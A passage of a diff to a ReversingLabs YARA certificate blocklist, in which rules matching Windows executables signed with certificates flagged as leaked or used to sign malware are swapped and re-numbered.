 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4cd08b9113a7c1f4f2d438ac59ad0be503daded3a08b8c8e8ce3e0dfdddf259e"
+		logic_hash = "2534e58ce1e5adbb10dbacb664d40cc32faec341bdb93b926cc85b666cc7b77e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16565,21 +38959,21 @@ rule REVERSINGLABS_Cert_Blocklist_51Cd5393514F7Ace2B407C3Dbfb09D8D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APPI CZ a.s" and pe.signatures [ i ] . serial == "51:cd:53:93:51:4f:7a:ce:2b:40:7c:3d:bf:b0:9d:8d" and 1605299467 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA G2" and pe.signatures [ i ] . serial == "0a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3e" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B72179C027B9037Ee220E81Ab18Fe56D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_469C2Cb0 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "85639e74-80b0-59c6-b31b-5b3d9587b37a"
+		id = "dd19b988-747d-55b9-825b-2ada1ca83691"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6882-L6900"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L945-L961"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1416768011ff824307d112bdeecce1ad50d1f673e92bef8fddbbeb58ff98b1b1"
+		logic_hash = "67ff84475cbe231f97daa3ce623689e7936db8e56be562778f8a4c1ebf7bf316"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16589,21 +38983,21 @@ rule REVERSINGLABS_Cert_Blocklist_B72179C027B9037Ee220E81Ab18Fe56D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Planeta, TOV" and ( pe.signatures [ i ] . serial == "00:b7:21:79:c0:27:b9:03:7e:e2:20:e8:1a:b1:8f:e5:6d" or pe.signatures [ i ] . serial == "b7:21:79:c0:27:b9:03:7e:e2:20:e8:1a:b1:8f:e5:6d" ) and 1603381300 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Services 1024 CA" and pe.signatures [ i ] . serial == "46:9c:2c:b0" and 1308182400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_07B74C70C4Aa092648B7F0D1A8A3A28F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4C0E636A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f941b7d6-f168-57aa-881a-54679a2b948c"
+		id = "beb2039c-3b0e-5649-96ca-40175493e62c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6902-L6918"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L963-L979"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "97759fa2e519936115f0493e251f9abc0cce3ada437776a5a370388512235491"
+		logic_hash = "20169cf9ce3f271a22d1376bcf0ff0914f43937738c9ed61fd8e40179405136b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16613,21 +39007,21 @@ rule REVERSINGLABS_Cert_Blocklist_07B74C70C4Aa092648B7F0D1A8A3A28F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rad-Grad D.O.O." and pe.signatures [ i ] . serial == "07:b7:4c:70:c4:aa:09:26:48:b7:f0:d1:a8:a3:a2:8f" and 1603240965 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digisign Server ID - (Enrich)" and pe.signatures [ i ] . serial == "4c:0e:63:6a" and 1320191999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4C8Def294478B7D59Ee95C61Fae3D965 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_072714A9 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "549249df-690c-5b75-ac1a-77b509c9e163"
+		id = "15ad6936-78a4-58b1-8c68-27ec4ed38649"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6920-L6936"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L981-L997"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3b7b10afa5f0212bd494ba8fe32bef18f2bbd77c8ab2ad498b9557a0575cc177"
+		logic_hash = "8bea4cfb60056446043ef90a7d01ecc52d82d9e7005a145a4daa61a522ecd2ae"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16637,21 +39031,21 @@ rule REVERSINGLABS_Cert_Blocklist_4C8Def294478B7D59Ee95C61Fae3D965 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREAM SECURITY USA INC" and pe.signatures [ i ] . serial == "4c:8d:ef:29:44:78:b7:d5:9e:e9:5c:61:fa:e3:d9:65" and 1592961292 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digisign Server ID (Enrich)" and pe.signatures [ i ] . serial == "07:27:14:a9" and 1320191999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7D36Cbb64Bc9Add17Ba71737D3Ecceca : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_00D8F35F4Eb7872B2Dab0692E315382Fb0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ce10840c-150d-5ecd-ab9a-7bc96092ebfd"
+		id = "2c051732-76d7-5562-a79e-c5bbdc8373b2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6938-L6954"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L999-L1017"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5874860582ed5be6908dca38e6ecae831eeeb0c2b768e8065ada9fd5ac2bda89"
+		logic_hash = "463757c59c32859163ea80e694e1f39239c857124aad3895f22f83b47645910c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16661,21 +39055,21 @@ rule REVERSINGLABS_Cert_Blocklist_7D36Cbb64Bc9Add17Ba71737D3Ecceca : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LTD SERVICES LIMITED" and pe.signatures [ i ] . serial == "7d:36:cb:b6:4b:c9:ad:d1:7b:a7:17:37:d3:ec:ce:ca" and 1616025600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "global trustee" and ( pe.signatures [ i ] . serial == "00:d8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0" or pe.signatures [ i ] . serial == "d8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0" ) and 1300060800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ad255D4Ebefa751F3782587396C08629 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_750E40Ff97F047Edf556C7084Eb1Abfd : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "e42d2881-efda-5aa0-b455-dabbd3a77e97"
+		id = "7ae4ba81-82be-57f9-aa8c-0e5c30e412c6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6956-L6974"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1019-L1035"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "43f44cbedf37094416628c9df23767be3b036519f93222812597777a146ecb24"
+		logic_hash = "21c2468905514e1725a206814b0c61c576cf7f97f184bac857bca9283f49a957"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16685,21 +39079,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ad255D4Ebefa751F3782587396C08629 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ornitek" and ( pe.signatures [ i ] . serial == "00:ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29" or pe.signatures [ i ] . serial == "ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29" ) and 1614643200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Corporation" and pe.signatures [ i ] . serial == "75:0e:40:ff:97:f0:47:ed:f5:56:c7:08:4e:b1:ab:fd" and 980899199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_262Ca7Ae19D688138E75932832B18F9D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1B5190F73724399C9254Cd424637996A : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "7151fd62-7f6c-59d7-800b-65e5b4db279b"
+		id = "dfb08450-c35c-5b7b-9d04-2c9a6af9bcf8"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6976-L6992"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1037-L1053"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a5bb946c6199cd47a087ac26f0a996261318d1830191ea7c0e7797ff03984558"
+		logic_hash = "08f287ccda93e03a7e796d5625ab35ef0de782d07e5db4e2264f612fc5ebaa21"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16709,21 +39103,21 @@ rule REVERSINGLABS_Cert_Blocklist_262Ca7Ae19D688138E75932832B18F9D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bisoyetutu Ltd Ltd" and pe.signatures [ i ] . serial == "26:2c:a7:ae:19:d6:88:13:8e:75:93:28:32:b1:8f:9d" and 1616025600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Corporation" and pe.signatures [ i ] . serial == "1b:51:90:f7:37:24:39:9c:92:54:cd:42:46:37:99:6a" and 980812799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_59A57E8Ba3Dcf2B6F59981Fda14B03 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_00Ebaa11D62E2481081820 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "12c80895-57fd-5341-b3ef-d59c25d4c234"
+		id = "e192d271-b5de-5acc-a04f-02a26d9231ac"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6994-L7010"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1055-L1072"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6e77c7d0bd7e5e9bc8880cc6ffc3f5f4f738e3dde22c270ad7a6f6672a99de53"
+		logic_hash = "2fafc6775ec88b5a1000afbc7234fbef6b03e9eaf866dae660dd2d749996cb5c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16733,21 +39127,21 @@ rule REVERSINGLABS_Cert_Blocklist_59A57E8Ba3Dcf2B6F59981Fda14B03 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Medium LLC" and pe.signatures [ i ] . serial == "59:a5:7e:8b:a3:dc:f2:b6:f5:99:81:fd:a1:4b:03" and 1609113600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Enforced Licensing Intermediate PCA" and ( pe.signatures [ i ] . serial == "00:eb:aa:11:d6:2e:24:81:08:18:20" or pe.signatures [ i ] . serial == "eb:aa:11:d6:2e:24:81:08:18:20" ) )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Aebe117A13B8Bca21685Df48C74F584D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Aab11Dee52F1B19D056 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "ec525737-9770-585e-922a-43f14e0a4a37"
+		id = "c6334520-7f93-59d0-8a22-721b928c14d1"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7012-L7030"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1074-L1089"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e7fbc1f32adec39c94dc046933e152cd6d3946da4a168306484b7b6bc7f26fb6"
+		logic_hash = "1f1215143dc828596e6d7eeff99983755b17eaeb3ab9d7643abdbb48e9957c78"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16757,21 +39151,21 @@ rule REVERSINGLABS_Cert_Blocklist_Aebe117A13B8Bca21685Df48C74F584D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NANAX d.o.o." and ( pe.signatures [ i ] . serial == "00:ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d" or pe.signatures [ i ] . serial == "ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d" ) and 1613520000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Enforced Licensing Intermediate PCA" and pe.signatures [ i ] . serial == "3a:ab:11:de:e5:2f:1b:19:d0:56" )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Dcd19A94535F034Ee36Af4676740633 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6102B01900000000002F : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "c09778b6-17c9-5b24-8977-1bd998083c23"
+		id = "b98769c6-805e-5cd0-96f1-67418fec40a6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7032-L7048"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1091-L1106"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7079d4f1973ad4de21e1f88282c94b11c4d63f8bad12b35ef76a481e154d9da3"
+		logic_hash = "6c42daa8b8730541bb422ac860ec4b0830e00fdb732e4bb503054dbcae1ff6d4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16781,21 +39175,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Dcd19A94535F034Ee36Af4676740633 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Toko Saya ApS" and pe.signatures [ i ] . serial == "7d:cd:19:a9:45:35:f0:34:ee:36:af:46:76:74:06:33" and 1609200000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Enforced Licensing Registration Authority CA (SHA1)" and pe.signatures [ i ] . serial == "61:02:b0:19:00:00:00:00:00:2f" )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ca4822E6905Aa4Fca9E28523F04F14A3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_01E2B4F759811C64379Fca0Be76D2Dce : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "004454a0-20f9-58f5-8c24-8097f7586c5b"
+		id = "00effc8a-066c-54ff-891e-c635d161b171"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7050-L7068"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1108-L1124"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9633f3494e9ece3a698d47c5ba2b7ee7f82cee4be36ac418c969c36285c4963c"
+		logic_hash = "0dff7a9f2e152c20427ea231449b942a040e964cb7dad90271d2865290535326"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16805,21 +39199,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ca4822E6905Aa4Fca9E28523F04F14A3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELISTREID, OOO" and ( pe.signatures [ i ] . serial == "00:ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3" or pe.signatures [ i ] . serial == "ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3" ) and 1614643200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sony Pictures Entertainment Inc." and pe.signatures [ i ] . serial == "01:e2:b4:f7:59:81:1c:64:37:9f:ca:0b:e7:6d:2d:ce" and 1417651200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_24C1Ef800F275Ab2780280C595De3464 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_03E5A010B05C9287F823C2585F547B80 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "251212a5-95ce-5d9f-aec0-e6d3dd099349"
+		id = "14ad79c7-f669-59a6-94d1-978a13fbb337"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7070-L7086"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1126-L1142"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7536ec92f388234bea3b33bee4af52e0e0ce9cd86b1c8321a503f70bfe5faa76"
+		logic_hash = "1d57b640ee313ad4d53dc64ce4df3e4ed57976e7750cfd80d62bf9982d964d26"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16829,21 +39223,21 @@ rule REVERSINGLABS_Cert_Blocklist_24C1Ef800F275Ab2780280C595De3464 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOLGAN LIMITED" and pe.signatures [ i ] . serial == "24:c1:ef:80:0f:27:5a:b2:78:02:80:c5:95:de:34:64" and 1614729600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MOCOMSYS INC" and pe.signatures [ i ] . serial == "03:e5:a0:10:b0:5c:92:87:f8:23:c2:58:5f:54:7b:80" and 1385423999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6401831B46588B9D872B02076C3A7B00 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Fe7Df6C4B9A33B83D04E23E98A77Cce : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "61b67e68-9e15-5848-b12a-437a0ad8399e"
+		id = "47a10658-c5c4-58b6-b154-7babcfbc50a2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7088-L7104"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1144-L1160"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cb84b27391fa0260061bc5444039967e83f2134f7b56f9cccf6a421d4a65a577"
+		logic_hash = "da5ed07def8d0c04ea58aacd90f9fa5588f868f6d0057b9148587f2f0b381f25"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16853,21 +39247,21 @@ rule REVERSINGLABS_Cert_Blocklist_6401831B46588B9D872B02076C3A7B00 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIV GROUP ApS" and pe.signatures [ i ] . serial == "64:01:83:1b:46:58:8b:9d:87:2b:02:07:6c:3a:7b:00" and 1615507200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PIXELPLUS CO., LTD." and pe.signatures [ i ] . serial == "0f:e7:df:6c:4b:9a:33:b8:3d:04:e2:3e:98:a7:7c:ce" and 1396310399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A01A91Cce63Ede5Eaa3Dac4883Aea05 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_065569A3E261409128A40Affa90D6D10 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a1efbce8-3cca-5e07-a652-d67007c72a18"
+		id = "924c210b-f72a-51eb-af2a-9897faf8f677"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7106-L7122"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1162-L1178"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "58a26b44e485814fa645bfa490f3442745884026bb7a70327d4f51645ad3f69c"
+		logic_hash = "f8d68758704e41325e95ec69334aaf7fabe08a6d5557e0a81bac2f02d3ab5977"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16877,21 +39271,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A01A91Cce63Ede5Eaa3Dac4883Aea05 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Seacloud Technologies Pte. Ltd." and pe.signatures [ i ] . serial == "0a:01:a9:1c:ce:63:ed:e5:ea:a3:da:c4:88:3a:ea:05" and 1618876800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Police Mutual Aid Association" and pe.signatures [ i ] . serial == "06:55:69:a3:e2:61:40:91:28:a4:0a:ff:a9:0d:6d:10" and 1381795199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_54Cd7Ae1C27F1421136Ed25088F4979A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0979616733E062C544Df0Abd315E3B92 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "76999ae0-966e-5c52-8e00-a3af8afd8fae"
+		id = "73222a8d-df63-5784-b5a2-0d936db8ddcb"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7124-L7140"
